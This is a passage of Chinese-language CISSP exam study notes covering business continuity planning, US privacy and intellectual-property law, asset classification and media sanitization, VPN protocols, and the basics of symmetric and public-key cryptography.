性排序。开会讨论重要性。为了定量分析,应该列出组织资产清单,并 且给出每个资产的AV以备后用;为每个业务确定一个最大允许中断时间 (MTD/MTO,maximum tolerable downtime/maximum tolerable outage),然后确定恢复时间目标RTO。RTO要小于MTD。 (2)风险识别。这个部分其实是纯粹的定性分析,只是识别一下。可能 性和损害都先不考虑。另外别忘了云服务商的影响,可以派一个人去看, 也可以查看供应商雇佣的审计事务所出具的评估报告,SOC-1(服务组织 控制)报告主要针对财务,如果想核查安全、隐私、可用性,要看SOC-2、 SOC-3,美国会计师协会(AICPA)建立和维护这些报告的标准。 (3)可能性评估。主要是确定ARO。 (4)影响评估。尝试确定每种风险对业务产生的影响,要确定EF、SLE、 ALE。暴露因子是指,一次大火会造成70%的建筑物被损坏,那么暴露因 子就是70%。 (5)确定业务连续性资源分配的优先级。其实就是优先解决哪些风险, 主要根据风险的定量分析和定性分析结合起来分析,这可是个技巧。你 必要与BCP团队和代码表高级管理层的人员坐在一起,将定量和定性两个 列表合并成一个优先级列表。一家防火公司肯定要把火灾的风险排在高 优先级,要不然太没面子。 (三)连续性计划(不仅仅是编制计划,其实里面包括了实现) 这个阶段专注于连续性策略开发(结果就是根据BIA决策是否接受一些 风险、风险缓解措施)、计划制定,主要是设计预备和处理(预备人、 建筑物、基础设施,强化它们、冗余它们),计划批准、计划实现、培 训教育。最后是维护。 (1)策略开发。策略开发为BIA和连续性计划之间架起桥梁,BCP团队根 据定量和定性的资源优先级确定事项优先列表,参考MTD并确定处理或 接受哪些风险。比如埃及不考虑暴风雪风险。 (2)预备和处理(provisions and processes),预备和处理是整个业务连 续性方案的重要部分。在这个任务中,BCP 团队设计了具体的过程和机 制,将在策略开发阶段缓解被认为不可接受的风险。下列三种资产类型 必须通过预备和处理来保护:人、建筑物/设施、基础设施。人是最有 价值的资产,人的安全要优先于商业目标。要考虑灾难时的食宿和办公 环境。 1、必须确保组织内部的人在紧急事件发生前、发生期间和发生后都是 安全的。一旦达到这些目标,你就要ᨀ供provisions允许员工处理他们的 BCP 和操作任务。 2、对于建筑物和设施,要强化(harden)现有设施(办公设备、制造 车间、操作中心、仓库、维修站等),要能够抵御策略开发阶段定义的 风险。比如像修补漏屋顶这种简单的,也可能像安装飓风遮蔽物和防火 墙一样复杂。 3、在不可能强化设施的时候,需要明确灾难时能ᨀ供的备选站 (Alternative site)。这时候涉及到灾难恢复了。 4、对于基础设施(服务器、网络等),要物理强化系统(Physically Hardening Systems ,如防火、UPS),也要ᨀ供冗余的预备系统 (Alternative Systems) 。哪些是基础设施?服务器、工作站和各站点之 间的通信连接。BCP 必须说明如何保护这些系统,从而抵御策略开发阶 段所确定的风险。 5、基础设施组件还包括运输系统、电网、金融系统、供水系统等。 (3)计划批准。资深管理人员的批准和参与是整个BCP工作成功的关键。 如果可能,让董事长、CEO之类的领导批准。 (4)计划实现。一旦得到高级管理层的批准,就应当推动并开始实现计 划。BCP 团队应该共同开发一个实现计划,这个计划利用特定的资源, 从而尽可能迅速地实现“预备和处理”的目标。在完全部署所有这些资 源之后,BCP 团队应当监督恰当的 BCP 维护程序。 (5)培训和教育。计划直接和间接涉及的所有人都应当接受培训,了解 整个计划和个人职责。候补人员(B角)也要接受培训。 (四)BCP文档化 你的BCP方法论都要记录在纸上,ᨀ供历史记录,助于理解,助 于发现缺陷,助于参考。 (1)目标:在第一次BCP团队会议或会议之前就决定,比如连续工作, 连续停机不能超过15分钟等等。 (2)重要性声明:通常是一封信,发给员工,表明BCP的重要性(消耗 大量资源),由高管签发。通常由CEO 或类似级别领导来签名,这样就 会在组织内有很大的影响和执行力。 (3)优先级声明:指的是业务优先级,要声明这是BCP的产物并仅仅体 现紧急情况下所反映的业务操作连续性的重要性,否则引争端。 (4)组织职责声明:可能并入重要性声明中,反映了“业务连续性是所 有人的职责” ,也来自高管。 (5)紧急和时间声明(The statement of urgency and timing ):声明了 BCP实现的重要性,概述了实现BCP的时间表,这由BCP团队决定,上层 同意。 (时间表通常应该单列在一个文档中,或者和这个紧急声明在一起。) (6)风险评估:包括AV、EF、ARO、SLE、ALE等,要定期更新。 (7)可接受的风险/风险缓解。包含策略开发部分的结果,᧿述所有风 险,并对可接受的风险᧿述原因,对不可接受的᧿述风险缓解措施。业 务管理者要对风险接受有一个正式文档。 (8)重大记录计划(vital records program):首先要识别重大记录(非 常重要的业务记录),坐下来好好想想,把所有重大记录找出来,然后 在系统中找出它们,᧿述这些内容备份在哪里,以及如何恢复。“执行 重大记录计划最大的挑战之一,通常首要的是识别重大记录。” (9)应急响应指南(guideline)概述了组织和个人对于紧急事件立即响 应的职责。给所有人看,主要是让首先发现紧急事件的员工可以激活BCP 步骤,如立即响应程序(比如防火程序)、通知清单(打电话给谁)、 在等BCP团队来的时候,首先发现人员可以做的二级响应。 (10)维护:BCP团队不应该解散,而是应当定期讨论BCP、复审BCP测 试的结果;组织任务和资源如果发生了激烈变动,需要重新开始BCP。所 有旧的BCP版本都应该销毁避免混淆;将BCP内容放在工作᧿述中会很好。 (11)测试和演习:BCP应该有一个测试和演习(比如防火演习),这能 保证BCP是最新的,能确保所有人都接受了充分培训,从而在灾难发生时 他们可以履行职责。 第4章 法律、法规和合规性 1、在美国,政府各级别机构通过代表建立刑法(criminal law);在联邦 一级,众议员和参议院使刑法法案变成联邦的法律(在跨州案件中生 效)。所有联邦和州的法律都必须遵守宪法。 2、民法(civil law)管理不属于犯罪但需要公正的仲裁者来解决个人之 间和组织之间的纠纷。民法不会关押人,但可能会有严厉的经济处罚。 3、行政法(administrative law)以政策、规章、制度的方式管理机构的 日常运作,行政法必须遵守民法和刑法,也必须遵守宪法并接受司法审 查(judicial review)。行政法被颁布在CFR中(Code of Federal Regulations)。 4、应该学习的重要一课是:知道何时向法律专家咨询。 5、美国于1984年首先制定了计算机欺诈和滥用法案(CFAA,computer fraud and abuse act),对联邦计算机系统造成恶意损失超过1000美元的 行为,修改医疗记录的,买卖密码的,不经授权访问只能由政府使用的 计算机的,未授权访问了机密信息和财务信息的。1986年进一步修正, 金融机构使用的计算机也不能未授权访问。1994年,CFAA进一步修正。 6、1998年,制定了数字千禧年版权法案(DMCA,Digital Millennium Copyright Act),主要保护CD和DVD不被复制(对重复罪行最高100万美 元,10年徒刑)。非营利性机构(图书馆和学校)不在此列。而且为ᨀ 供互联网服务的运营商ᨀ供安全港保护。 7、无形资产被总称为知识资产(IP),随着很多公司从制造商向服务商 的转变,知识产权越来越重要,有一大堆的法律来保护所有者的权利。 四种主要类型:版权、商标权、专利权、商业秘密 8、版权(copyright):防止创作者的作品遭到未经授权的复制。(文学 /软件、音乐、戏剧、舞蹈、绘画/雕刻、电影、录音、建筑),注意 软件属于文学作品,但只保护软件的代码,不保护软件背后的思想和过 程。外观是否保护还有争议。版权保护的是构思的特定表达。 9、版权的所有权是创作者的,但员工的作品是被“租用”的(“for hire” ,work for hire)。 10、版权保护时间是作者死后70年。work for hire或者匿名作品的保护时 间是第一次出版日期后95年或者制作日期后120年,取两者中短的。 11、商标(trademark):商标是单词、口号(slogan)和标志语(logo), 用于标识某家公司的产品或服务,主要是避免市场发生混乱。 12、与版权的保护一样,为了获得法律的保护,商标不需要正式注册。 如果在公众活动期间使用了商标,那么你会自动受到相关商标法的保护, 并可以使用TM符号表示想要保护作为商标的单词或口号。 13、如果想让别人正式认可,要在美国专利和商标局(USPTO,U.S. Patent and Trademark office)注册,律师会尽职的搜索排除障碍,注册需 要一年多时间,拿到证书后就可以用圈R标记。商标不能和其他商标类似, 在公示期间别人可以质疑;商标不应该带有᧿述性;商标准许期10年, 到期后可以再续10年。可以通过intent to use,事先注册一些并不用的商 标。 14、专利权(patent):20年的保护,在此期间发明者有独家使用发明 的权力。专利结束后,所有人可以使用,专利的三个要求:新的、有用 的、不能是obvious的。主要用于保护硬件设备和制造过程,但也有涉及 软件程序的(也就是这块没有适当的保护)。 15、商业秘密(trade secrets):版权和专利都会公开工作或发明的细节。 而且都是有限时间的保护。所以商业秘密自己想法保守,并且和授权访 问的人签署不泄漏协议NDA。源代码如果是商业秘密,不要让别人知道。 1996年颁布的经济间谍法案保护这类商业秘密。 16、许可证(license)有4种类型: 合同(contractual)许可证协议写在合同里。 收缩性薄膜(shrink-wrap)包装许可证,写在软件包装外面的协议,撕 开收缩薄膜包装就表明承认了条款。 单击通过(click-through)许可证,安装过程中要求点击一个按钮,表 示阅读过并且同意遵守。 云服务许可协议。将单机通过许可证推向极致。 17、统一计算机信息处理法案UCITA为shrink-wrap和click-throughᨀ供了法 律支持。还要求生产者为用户ᨀ供选择,在完成安装过程之前可以拒绝 协议条款,并能受到全额退款。 18、美国公民隐私权的基础是美国宪法的第四修正案:人们保护其人身、 房屋、证件(paper)和财物(effects)不受无理搜查和没收的权利不应 当违反,并且这些违反行为不应得到授权批准,但是那些可能性很大的 原因、受到誓词或证词支持的、特别᧿述的需要搜查的地方和需要逮捕 或扣押的人或物品除外。 19、1974年的隐私法案(privacy act of 1974),在没有得到当事人书面 同意的情况下,不能向他人或机构泄漏隐私信息。 20、1986年的电子通信隐私法案(Electronic Communication Privacy Act, ECPA)应用于监视邮件和语音,ECPA使得对蜂窝电话的监听非法。侵犯个 人的电子隐私是一种犯罪行为,禁止非授权的监视电子邮件和语音邮箱。 21、1994年的通信协助执法法案(Communication Assistance for Law Enforcement,CALEA)对ECPA修正,CALEA要求运营商允许执法人员窃听。 22、1996年的健康保险流通与责任法案HIPAA,要求医院、医师、保险公 司和其他处理个人医疗隐私信息的组织采取严格的安全措施。 23、2009年的经济和临床健康的卫生信息技术法案(Health Information Technology for Economic and Clinical Health, HITECH)修订了HIPAA。 24、2000年,儿童联机隐私保护法案(Children's Online Privacy Protection Act,COPPA)对关心孩子或有意收集孩子信息的网站ᨀ出了一系列要求, 必须发送隐私通知,清楚说明收集信息的类型和用途。必须向父母ᨀ供 机会,复查任何从他们孩子那里收集到的信息。如果孩子的年龄小于 13 岁,那么在收集信息前,父母必须对有关孩子信息的收集做出可证实的 允许。 25、2001年,USA PATRIOT爱国者法案,扩大了执法机构的能力,官方可 以一次性获取对某人的一揽子通信监听授权。 26、子女教育权利和隐私法案(Family Educational Rights and Privacy Act, FERPA),父母和学生有权检查教育机构保存的教育记录,有权要求改正 不正确的记录,或者在记录中声明没有修改的内容。学校不能不经书面 许可而发放学生记录的个人信息,某些特定的情况除外。 27、工作场所的隐私:员工在使用公司设备的时候没有隐私,公司有书 面说明告知这些,登录界面有警示。 28、PCIDSS是一个非法律但有合同义务的合规要求,一共12点:要装防 火墙、不用默认口令、保护持卡人数据、加密传输、杀毒、开发安全的 系统、限制对持卡人数据的访问、访问系统要经过标识和认证、限制物 理访问、监控访问、定期安全测试、对所有人宣传信息安全策略。 29、组织要经受合规性审计,要么通过标准的内部或外部审计,要么通 过监管及其代理。除了这些正式的审计,组织经常把合规遵从报告发送 给内部或外部股东。 领域2-资产安全 第5章 保护资产的安全 1、资产安全的第一步是对资产进行分类和标记。 2、PII除了可以识别个人的那些信息,还包括出生日期、出生地、娘家姓、 医疗信息、教育信息、金融信息、就业信息。我看简历上的大多数信息 都算。 3、组织有责任保护PII,如果遭到泄露,要通知个人。 4、PHI是个人健康有关信息,健康保险流通与责任法案(HIPAA)保护 PHI。雇主一般ᨀ供和补充医疗策略,也都会有PHI,也要保护PHI。 5、专有数据(proprietary data)指的是帮助组织保持竞争优势的数据。 代码、技术方案、流程制度、商业秘密都是。 6、政府数据分类:top secret(给国家安全带来grave damage), secret(serious damage),confidential(damage),unclassified(这类 可以通过信息自由法案(freedom of information act,FOIA来申请查阅) 7、商业分类:confidential/proprietary,private,sensitive(这个比 unclassified和public强),public 比如: 机密或专有:索尼攻击后,攻击者发布了几个电影的未发布版本。 私有:攻击者发布了索尼公司 30 000 多名员工的薪资信息,包括 17 位高管数百万美元的薪水。 敏感:攻击者发布了一份被解雇或终止合同的所有员工的电子表格。其 中包括终止的原因和每个员工终止合同的成本。他们还发布了几封电子 邮件,包括尴尬的评论。 8、组织至少应该标记(label)和加密比较敏感的邮件。比如: 公开:明文; 敏感:加密; 隐私:加密、保持加密、只能给组织内收件人; 机密:加密、保持加密,组织内收件人、只有收件人可看被转发者不 能看,只能打开不能保存,不能拷贝粘贴,不能打印。 9、发送者给邮件加分类标签的好处是,DLP可以方便帮助防护。 10、数据状态:在静止、传输以及使用过程中,都需要保护,保护数据 的最好方法是加密,此外还有身份认证和授权控制。 静止的数据可以加密; 传输的数据可以加密; 使用中的数据是指应用程序正在用的,一旦用完立刻从内存中清空。 11、管理敏感数据:标记(marking or labeling)、管理、存储、销毁、 保留。 12、标记:物理标签、红色U盘复制机密数据、水印、标题、脚注、专用 文件夹,桌面背景、警示语、对文件做技术手段的标注可以方便DLP检测。 13、例如,一些组织大量购买红色的 USB 闪存盘,员工只能把机密数据 复制到该盘上。技术安全控制中心用通用唯一识别符(UUID)来识别这 些闪存盘,进而执行安全策略。DLP 系统能阻止用户将数据拷贝到其他 USB 设备上,并且能确保当用户将数据复制到这样的设备时,数据会被 加密。 14、非保密数据也做标记的话,会显得更严谨,会防范无心的疏忽失误。 15、许多组织都禁止介质降级,与其净化数据,还不如买新的。系统也 是,一旦处理过绝密数据,就几乎不可能再标记为非机密系统。 16、存储:AES256是强大的加密。 17、物理防范措施包括将硬盘放在保险箱、保险柜、安全室内等等。任 何敏感数据的价值都大于存储介质的价值,可以买点贵的安全USB。 18、所有的消除、清除、净化过程都要小心,很可能因为人为操作失误 无法正常执行任务,消除完了一定要验证是否成功了。 19、硬盘、软盘、磁带是可以通过消磁来删除数据剩磁的。但SSD固态硬 盘没有数据消磁,所以消磁无效。而且没有什么很好的方法确保能删除 SSD上的文件,最好的方法就是粉粹成尺寸2mm以下的颗粒。 20、擦除(Erasing)就是删除操作。 消除(clearing or overwritting),就是拿字符来覆盖,比如一种方法 是将某个字节写一遍,取反再写一遍,然后随机数再写一遍。这可以防 止传统恢复工具,但实验室或取证技术仍然有可能恢复。另外磁盘的 spare、bad区域是写不到的,SSD也不一定总能消除干净。 清除(purging),多次重复的消除(clearing),并结合去磁等 方式,让设备可以再次使用,用已知方法无法恢复原有数据,但不是绝 对可靠的。美国政府不会考虑采用任何的清除方法来清除绝密数据。标 记为绝密数据的介质将始终保留最高机密,直到被摧毁。 解除分类(declassification):基本同上,在非机密的情况下,采 用清除(purge)的方法,让设备可以reuse。为了规避风险,许多企业不 解除分类任何介质。 净化(santization):是一种组合式的方式,当一台计算机被处置 时,净化确保所有的非易失性存储器已被去除或被破坏,系统在任何驱 动器中都不含CD/DVD 光盘,且内部硬盘(硬盘驱动器和 SSD)Have been purged, removed, and/or destroyed。可以破坏(destruction)也可以 不破坏介质。 消磁(degaussing):用强大磁场将磁介质(磁盘磁带软盘)的 磁场区域重新排列,仅对磁介质有效。对CD、DVD、SSD固态硬盘无效 (最好是粉碎机来破坏,粉粹到2毫米)。对磁带这样做最好,对硬盘而 言,不是很推荐,因为不确定数据是否被消除干净。 销毁(destruction):介质生命周期最后阶段,这是santization的 最安全方法。可以是焚烧、破碎、粉粹、解体、腐蚀、溶解等等。 21、当企业捐赠或出售二手电脑设备时,他们通常会remove并destroy存 储设备,而不是用purge,因为purging并不是很可靠。 22、保留资产(retaining asset):包括记录保留、介质和系统保留(硬 件保留到被净化)、人员保留(主要是保留他的知识,通过NDA不让他 泄漏)。许多组织要求保留审计日志3年或者更长。保留时间越长,成本 就越高。 23、BitLocker使用了AES,它是基于TPM(可信平台模块)的磁盘驱动器 加密。 24、微软的加密文件系统(EFS)使用AES对文件和文件夹加密。AES支持 128、192、256位。 25、美国政府同意用AES加密top secret。 26、3DES使用112位或者168位密钥。微软的Onenote用的是3DES。 27、Blowfish是Bruce Schneier开发的,密钥长度从32位到448位,Linux的 bcrypt基于Blowfish,用来加密password,bcrypt还用了128位的salt来防止 彩虹表攻击。 28、2014年,谷歌发现SSL容易受到POODLE攻击(贵宾犬攻击,针对 SSL3.0,获取通信内容),所以基本上都禁用了SSL,而使用TLS。 29、IPSec(网际安全协议)通常和L2TP结合起来做VPN。 30、L2TP本身是个位于2层的隧道协议,使用IP(使用UDP)、FR、X.25、 ATM等网络,一般承载明文。L2TP的认证只限CHAP,但一般不用此认证, 而是使用上面承载的PPP协议的认证方式完成认证(EAP、PAP、CHAP 等)。 31、L2TP(Layer 2 Tunnel Protocol)是PPTP的后续版本(集合了PPTP和 L2F(也是一种隧道协议)的优点)。对于使用IP的情况,实际上是 PPPoverIP,L2TP使用UDP1701端口。 32、可以把L2TP数据放在Ipsec里面完成数据加密,相当于L2TP是上层应 用。 Ipsec[IP[UDP[L2TP[PPP[IP]]]]]], PPP用来获得内网IP。L2TP主要用来 承载PPP。使用UDP 4500是为了方便穿越NAT。实际运用的一个例子:IP/ UDP(4500)/ESP/UDP(1701)/L2TP/PPP/IP/TCP/HTTP 33、ISAKMP:在没有NAT设备的环境中用UDP500,IKE协商的时候都用的 是UDP 500。 在有NAT设备的环境中用UDP4500。(在协商时,发现了自 己在NAT设备之后的一方立即要将协商端口从500改为4500,源和目的端 口都是4500) 35、GRE工作在IP层上,协议号47,和TCP(6)、UDP(17)、ICMP(1) 工作在同一层。 Ipsec的ESP用的是协议号50,也在这一层。GRE一般不 穿越NAT。 36、PPTP是一个隧道协议(point to point tunneling protocol ),自身不ᨀ 供认证,先通过TCP 1723端口建立隧道,然后上面跑GRE,再跑PPP。 PPTP[GRE[PPP[IP]]], 37、SSH包括安全拷贝SCP和SFTP。 38、下面对数据角色做职责定义,在NIST SP 800-18中定义。 39、数据所有者是数据的最终责任人,通常是首席执行官、总裁或者部 门主管,他们定义分类,贴标签,制定用户行为规则(AUP),向系统 所有者ᨀ出安全要求和安全控制,决定谁可以使用系统以及其权限。 40、NIST SP 800-18中定义的行为规则(rules of behavior),也即 acceptable usage policy (AUP) ,定义了个体的责任和预期行为,以及违反 的后果,个体需要定期告知他们已经了解、理解和同意。 41、系统所有者(system owner)和数据所有者可能是一人,也可能不 是一人,如不同的部门主管,确保系统中数据的安全性。和数据所有者 要沟通,通过交流确保数据在存储、传输和运行时的安全。 系统所有者的责任: 开发安全计划(Develops a system security plan):开发和信息所有者、系 统管理者、功能终端使用者相一致的系统安全计划 维持安全计划并部署运行、对用户开展安全培训,如行为规则说明 (或是 AUP)。 当系统发生重大变化时,更新系统安全计划。 协助定义、执行和评估通用安全控制。 42、业务/任务所有者(bussiness/mission owner):通常是业务部门 的,也可能和系统所有者是同一个人。举例来说,销售部门可能是业务 所有者,但是信息技术部门和软件开发部门可能是系统所有者。业务所 有者负责确保系统能够给组织ᨀ供价值。然而,信息技术部门有时会过 度热情,执行安全控制,而不考虑业务的影响或其任务。 43、组织通常执行信息技术管理方法,如信息及相关技术的控制目标 (COBIT)。这些方法帮助业务所有者和任务所有者根据业务或任务需求 平衡安全控制要求。 44、数据处理者,是为数据控制者干活的人,比如:公司作为数据控制 者将工资单制作外包出去,那这个外包公司就是数据处理者,处理者有 责任保密,不能将数据用做他用。 45、GDPR的前身是欧盟数据保护指令(The EU Data Protection Directive, DPD),限制将数据传输至欧盟以外。美国商务部(The US Department of Commerce )据此执行安全港程序。GDPR于2018年5月25日生效。 46、7条安全港原则:任何组织都要告知个人收集和使用数据的目的 (Notice);要给个人ᨀ供选择的机会(Choice);在通知和选择的基础 上才能向其他组织传输数据(Onward transfer);组织要采取安全措施 保护数据(Security);完整性:组织不能把数据用作Notice和Choice之外 的他用,应采取措施确保数据reliable。(Data integrity);个人可以使用 组织持有的信息,信息不对的话,个人能够更新和删除(Access);组 织必须执行这些原则(Emforcement)。 47、7条原则:通知、选择、向前转移、安全、完整、访问、执行。 48、数据管理员(administrators),主要是分配权限的,不一定拥有全 部特权,通常采用基于角色的访问控制模型来非配权限,也即将用户账 户添加至群组,然后授予群组权限。OSG test:有时也干数据保管员的事。 49、数据保管者(Custodians):数据所有者将每天的任务委托给保管者。 保管者协助保护数据的安全性和完整性,定期备份。这通常是信息技术 部门的人(这人也有可能是分配权限的数据管理员)。 50、基线ᨀ供了一个起点,确保最低安全标准。基线的一个例子就是操 作系统镜像(Image)。基线要周期性的检查,确保维持在安全状态。举 例:微软组策略可以周期性地检查系统,调整设定以和基准线相匹配。 51、基线可以审视和裁剪(scoping and tailoring), 审视(范围)是指只选择那些适用的控制。例如,如果一个系统不允 许任何两人在同一时间登录,就不需要应用并发会话控制。 裁剪(定制、修订)则会修改某个具体的基线控制,使其与组织使命 (mission of the organization )相适应。例如,组织可能在本地办公使用 一组基线,但可能并不适用于远程办公点电脑。在这种情况下,组织可 以调整基线,并对远程电脑采取补偿安全控制。 52、在选择基线时,要考虑外部标准和要求。不处理信用卡交易的组织 不需要遵守 PCI DSS。 53、NIST SP 800-53把安全控制做了个基线, P-1:优先级最高:是基本的安全实践。 领域3-安全工程 第6章 密码学与对称密码算法 1、凯撒密码无非就是A换成D,称为ROT3密码或C3密码(cipher),⫿母 替代(是一种shift cipher,也是substitution,这个属于混淆confuse)。 2、只有公钥体系才提供不可否认性。 3、data at rest怕偷窃,data in motion(on the wire)怕窃听。 3、Kerchoff原则就是算法应当公开,所有密钥应当保密。可以归纳为 “敌人知道了这个体系”(the enemy konws the system),公开后可以 暴露更多算法上的弱点。这个原则反对security through obscurity (这是 早期的思想:试图通过隐匿实现安全)。 4、cryptography (密码术)and cryptanalysis(密码分析学) are commonly referred to as cryptology.(密码学) 5、分割知识(split knowledge):将信息或权限在多个用户间分配,任 何一个人没有足够权限危害安全性。最佳示例:密钥托管(escrow), 在密钥丢失和损坏时取出备份,M of N控制,就是至少M个代理一起工 作才能取出密钥,比如3 of 8 control。 6、工作函数(work function):密码系统的强度/安全性和工作函数成 正比,攻破密码系统的工作量就是工作函数,工作函数应该和受保护资 产的值匹配,大于受保护资产的时间价值即可。 7、code和cipher不一样,编码是表示词汇和短语的符号,保密或者不保 密,比如执法机构的通信“10系统”,间谍说“鹰着陆了”。密码则是 针对单个的字符和比特。 8、换位密码(transposition)(就是位置打乱,还是那些字符。这个属 于扩散。属于Diffusion。):比如apple换成elppa,再比如柱状换位 (columnar transposition)(非常有名,但有几个固有的弱点,容易受到 密码分析人员的攻击,现代不采用),用密钥attacker(按顺序对应 17823546)对信息“thr fighters will strike the enemy bases at noon”,加密 后TETEE FWKMT IIEYN HLHAO GLTBO TSESN HRRNS ESIEA。 9、替代密码(substitution),凯撒密码就是替代密码:加密:C=(P+3) mod 26 解密:P=(C-3)mod 26; 很多替代密码更复杂,比如Vigenere密码。明文M=m1m2…,密钥 K=k1k2..kd, 密文C=c1c2....,则加密Ci=(mi+ki)mod 26,解密 Mi=(Ci-ki+n) mod 26 虽然能够防范直接的频率分析,但容易遭受二阶形式的频率分析。 10、一次一密(one time pads,一次性填充),C=(P+K)mod 26,也被称 为vernam密码(贝尔实验室发明者名字),如果运用得当,它是一个不 可破解的加密方案。关键在于随机(而不要像Soviet密钥那样,其生成方 式被美国人发现了)。而且要做好物理保护。 11、本质上,凯撒密码、vigenere、vernam,区别只在于密钥的长度,分 别是1个字符、1个词、和消息一样长。 12、滚动密钥密码(Running key ciphers),也被称为书籍密码,加密密 钥与消息本身一样长,一般从书籍中选取。 13、密码学算法,依靠两种基本的操作:混淆和扩散。混淆(confuse): 明文和密钥的关系很复杂,难以通过更改明文和查看密文来判断key,换 位(Diffusion):明文的改变会引起多处变化, “替代”引入了混 淆,“换位”引入了扩散。substitution introduces confusion and the transposition introduces diffusion,所以,有的算法,先替换,然后再换 位。 14、对称密钥算法依赖于共享的秘密,称为secret key cryptography或者 private key cryptography。注意这里private key这个术语,指的是shared private key,不要和公钥体制中的私钥搞混了。 15、对称密钥的弱点:密钥分发需要预建立好的安全通道(经常是离 线)、未实现不可否认性,可扩展性(scalable)不好,大用户组的密钥 对太多,每当成员离开用户组时,所有涉及这个成员的密钥都要抛弃。 加密速度快,比非对称的速度高1000倍到10000倍。公钥算法和对称密钥 算法的优缺点互补。 16、对称密钥通常情况下,只ᨀ供机密性。而公钥算法还可以ᨀ供完整 性(主要通过签名实现)、身份认证和不可否认性。公钥算法不需要预 先的安全链接,一开始就可以安全通信。 17、DES是1977年发布的。在2001年被AES取代。DES有5种操作模式: ECB,CBC,CFB,OFB,CTR 电子密码本(electronic codebook,ECB,安全性最差) 密码分组链接(cipher block chaining,CBC,传播错误) 密码反馈(Cipher Feedback,CFB,流密码,传播错误,加密不能并 行,解密可以并行) 输出反馈(Output FeedBack,OFB,流密码,不传播错误,加解密都不 能并行) 计数模式(Counter,CTR,不传播错误,适合并行计算) 18、DES每次处理64位的明文,使用密钥的长度是56位(另外8位是奇偶 信息)。使用16轮加密,都是通过XOR完成的。 19、ECB的安全性最差,因为相同的明文分组会加密产生相同的密文。这 样时间长了,就会把所有的可能记录下来查字典破译。ECB模式仅仅适用 于很少量的数据加密。 20、CBC模式,每个分组在加密前,先和前一个密文分组异或。解密后也 和前一密文再异或。CBC还有一个IV,它是和第一个分组异或的。 21、IV要发给接收方,可以明文放在密文最前面,也可以用ECB保护。 CBC模式要考虑错误传播,一个分组在传输中被破坏,会影响下一个分组。 加密不可并行,解密可以并行。 22、CFB模式,是流密码形式的CBC,对IV或前一块密文加密后产生密钥, 直接和本块明文异或产生本块密文。(每次加密可以是8位(取前8位即 可),也可以是64位)。 之所以称为流密码,关键在于它的加密方式 为“异或”。 23、OFB模式,也是流密码,但并不是像CFB那样将密文加密产生密钥, 而是将前一块的流密钥加密后产生本块的流密钥。这种方式不传播错误, OFB的加密和解密都不能并行。 24、计数模式,使用简单计数器,加密后作为密钥。和OFB一样,不传播 错误。很适合并行计算。 25、3DES,有4种版本: 可以是EEE或EDE,密钥可以是2个或3个。 EEE3:E(K1,E(K2,E(K3,P))) EDE3:E(K1,D(K2,E(K3,P))) EEE2:E(K1,E(K2,E(K1,P))) EDE2:E(K1,D(K2,E(K1,P))) 后两种的密钥的有效长度为112位。 还有一种EDE1,事实上只 是向后兼容而已。这4种模式的安全性是一样的。 26、人们试过2DES,发现这种不安全。 27、IDEA(国际数据加密算法),来学嘉和瑞士学者联合推出的,主要 是针对DES密钥长度不够而开发的,对64位分组操作,IDEA密钥为128位。 PGP中使用了IDEA。 28、Blowfish(豚鱼),是Bruce Schneier发明的,仍然是对64位分组操作, 密钥是变长的,从32位到448位。速度比DES和IDEA都快。没有许可限制, 自由使用。 29、Skipjack由FIPS185(联邦信息处理标准)即EES(托管加密标准)批 准使用,对64位分组操作,密钥80位。也有4种操作模式。美国政府很快 接受了 Skipjack,并且ᨀ供支持 Clipper 和 Capstone 高速加密芯片的密 码学程序,这些芯片是为重要商业应用而设计的。NIST(国家标准和技 术协会)和财政部(Treasury)持有重建密钥的一部分信息。执法部门可 以找他们获得密钥。Skipjack 和 Clipper 芯片还没有被密码学团体普通接 受,这是因为它的托管程序由美国政府控制。 30、2000年10月,NIST宣布Rijndael成为DES的替代标准,12月,美国商 务部批准了FIPS197,要求使用AES对所有未分类的但敏感的数据进行加 密。 31、AES算法分组128位,使用128、192、256三种密钥强度(分别10轮、 12轮、14轮),最初的Rijndeal分组大小可以和密钥长度相等。 32、Twofish由Bruce Schneier发明,也是分组密码,处理128位数据,密 钥变长:1~256位,最大256位(16轮)。有两种独特的技术, prewhitening,postwhitening,加密前和加密后进行单独的与子密钥的异 或。 33、1976年,Diffie-Hellman算法发布,是密码学的一次大的进步。 Richard和Sue约定两个大数p(质数)和g(整数),1<g<p,这两个数 可以公开 Richard选择r,计算R=g^r mod p, See选择s,计算S= g^s mod p, 然后互相发R,S,但r,s要保密 Richard计算出K=S^r mod p和Sue计算出来的K=R^s mod p是一样的,也 就是共享的私有密钥了。 34、对于对称密钥而言,永远不要将加密密钥和加密数据存放在一个系 统中,对于敏感的密钥,可以考虑两个不同的人分别持有密钥的一半 (split knowledge)。 35、两种主要的密钥托管的途径:一是公平密码系统(Fair cryptosystems),密钥被分成两个或多个部分,每个部分都被交给相互 独立的第三方,法院需要时,向所有第三方要密钥。二是使用托管加密 标准EES,这种方法向政府ᨀ供解密密文的技术手段,是Skipjack的基础。 36、由于摩尔定律的存在,处理器最终能达到猜测密钥的计算能力。所 以密码是有生命周期的,安全专家需要选择安全协议(TLS、SSL)、安 全算法(AES、3DES)以及密钥的长度。如果设计的密码系统用来保护计 划将在下周执行的商业计划,就无须担心10 年内可以破解的风险。如果 要保护那种可能用于建造核弹的机密信息,那就需要在今后 10 年里一 直维护这个机密。 第7章 PKI和密码学应用 1、1977年,Ronald Rivest、Adi Shamir和Leonard Adleman提出了RAS算法, 算法申请了专利并成立了RSA公司。 选两个大质数p和q,n = p * q, 选择一个e,e<n, e和(p-1)(q-1)互质, 找到一个数d,使得(ed-1)mod(p-1)(q-1)=0, 公钥就是e和n,私钥就是d。 C=P^e mod n, P=C^d mod n 2、Merkle-Hellman背包算法,也是基于因式分解操作的难度,依赖于超 增序列(super-increasing set)的集合论组件,1984年被破解,不安全。 3、下面三种非对称密码系统的不同密钥长度可以ᨀ供相同的保护:RSA: 1088位,DSA:1024位,椭圆曲线:160位, (AIO:ECC用到手持设备 中比较省资源一点。) 4、El Gamal博士在1985年发表了文章,阐述DH算法背后的数学原理可以 扩展到整个公钥加解密系统中,他是公开发布的,没有申请专利(和RSA 不同),主要缺点是加密后消息的长度加倍。 5、1985年,两位数学家(一个来自华盛顿大学,一个来自IBM)独立的 ᨀ出了椭圆曲线密码系统ECC。解决椭圆曲线的离散对数问题比解决RSA 的质数因数分解和El Gamal的标准离散对数问题还要困难,所以其密钥长 度会比较短,1088位RSA强度相当于160位密钥的ECC强度。 6、RSA公司对散列函数的5个基本要求,输入值任意长度、输出值长度固 定、计算容易、单向的、不会发生冲突。SHA、MD2、MD4、MD5都是定 长的。 7、HAVAL(Hash of 